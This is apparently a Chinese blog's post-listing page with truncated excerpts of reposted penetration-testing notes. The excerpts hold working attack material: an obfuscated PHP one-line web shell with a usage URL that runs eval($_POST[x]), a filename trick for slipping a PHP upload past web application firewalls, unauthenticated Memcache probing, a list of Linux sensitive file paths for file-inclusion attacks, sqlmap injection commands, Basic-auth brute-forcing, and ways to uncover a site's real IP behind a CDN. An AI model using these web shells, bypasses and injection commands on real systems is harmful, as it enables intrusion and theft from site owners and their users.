- 博客(10)
- 收藏
- 关注
转载 PHP一句话
PHP一句话:php环境<=5.6都OK<?php usort($_GET,'asse'.'rt');?>使用方法:http://www.url.com/test.php?1=1+1&2=eval($_POST[x])转载于:https://www.cnblogs.com/buxuan/articles/6369803...
2017-02-06 11:49:00 258
转载 上传绕过WAF几种常见的姿势
1:WTS-WAF 绕过上传原内容:Content-Disposition: form-data; name="up_picture"; filename="xss.php"添加回车Content-Disposition: form-data; name="up_picture"; filename="xss.php"2:百度云上传绕过见下:百度云绕...
2017-02-06 11:48:00 281
转载 HTTP Basic认证 爆破
基于HTTP Basic认证的爆破网上有好多神器可以用,比如Burp Hydra等等。这里推荐一个小巧的pYTHON写的小工具,htpwdScanusage: htpwdScan.py [options]* An HTTP weak pass scanner. By LiJieJie *optional arguments: -h, --he...
2017-01-12 14:28:00 1705
转载 Memcache 漏洞的利用
root@kali:/home/buxuan/go-derper# telnet 12x.13x.xx.xxx 11211Trying 12x.13x.xx.xx...Connected to 12x.13x.xx.xxx.Escape character is '^]'.说明漏洞存在1:在内存中获取敏感信息stats items //...
2017-01-11 18:09:00 431
转载 Linux敏感目录
Linux敏感目录,网站存在包含漏洞,权限允许的条件下,写个批处理脚本。或者直接 放在burp里面批量跑!/apache/apache/conf/httpd.conf/apache/apache2/conf/httpd.conf/apache/php/php.ini/bin/php.ini/etc/anacrontab/etc/apache/apache.conf...
2017-01-09 18:06:00 668
转载 sqlmap 注入遇到问题总结
1:登陆后才能访问的页面 sqlmap.py -u "http://www.code521.com/index.php&a=b" -p a --dbms=mysql --cookie="cookie" –tables //抓包获取COOKIE,修改之后继续 sqlmap -r "/root/sql.t" //直接通过burp抓取整个页面的数据包...
2017-01-07 15:32:00 3728
转载 SqlMap检测注入点
检测注入点统一格式: sqlmap -u "http://www.code521.com/market1/index.php?market_id=1089" --random-agent --delay=0.5 --batch -v "4" --level=3 sqlmap -r "/root/url.t" --random-agent --delay=0...
2017-01-06 18:34:00 2039
转载 寻找使用了CDN之后网站的真是IP
1:通过二级域名主站使用了CDN,二级域名不一定也使用了CDN,例如:mail.xxx.com 二级域名可能没有使用CDN,对于这种情况可以通过查询二级域名来获得真实的IP地址.注意的是 通过二级域名查询出来的IP地址不一定是主站的IP地址,有可能做了A记录,但是很有可能 在一个C端内,此时针对整个C端直接 扫开放了80端口的,一个一个访问即可。2:通过国外冷门DNS大部...
2017-01-06 14:37:00 365
转载 theHarvester 修改版支持国内5大搜索引擎
国外大神的杰作,因为是国外的好多调用接口都是国外的内容,对国内用户不是很友好,再加上墙的限制,这个工具在国内就发挥不了他的作用了。艾特时代渗透测试团队对该工具进行了修改。增加了国内百度,360,sogou,youdao,神马 5大搜索引擎的结果调用,很好的完善了该工具针对国内用户的鸡肋使用限制!*******************************************...
2017-01-06 13:17:00 221
转载 dnsenum 实战用途
软件介绍dnsenum 是一款非常强大的 域名信息收集工具,该开发者是一个精通web渗透测试的安全人员,并对DNS信息收集有着非常丰富的经验。dnsenum的目的是尽可能收集一个域的信息,它能够通过谷歌或者字典文件猜测可能存在的域名,以及对一个网段进行反向查询。它可以查询网站的主机地址信息、域名服务器、mx record(函件交换记录),在域名服务器上执行axfr请求,通过谷歌脚本...
2017-01-05 20:06:00 1999
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人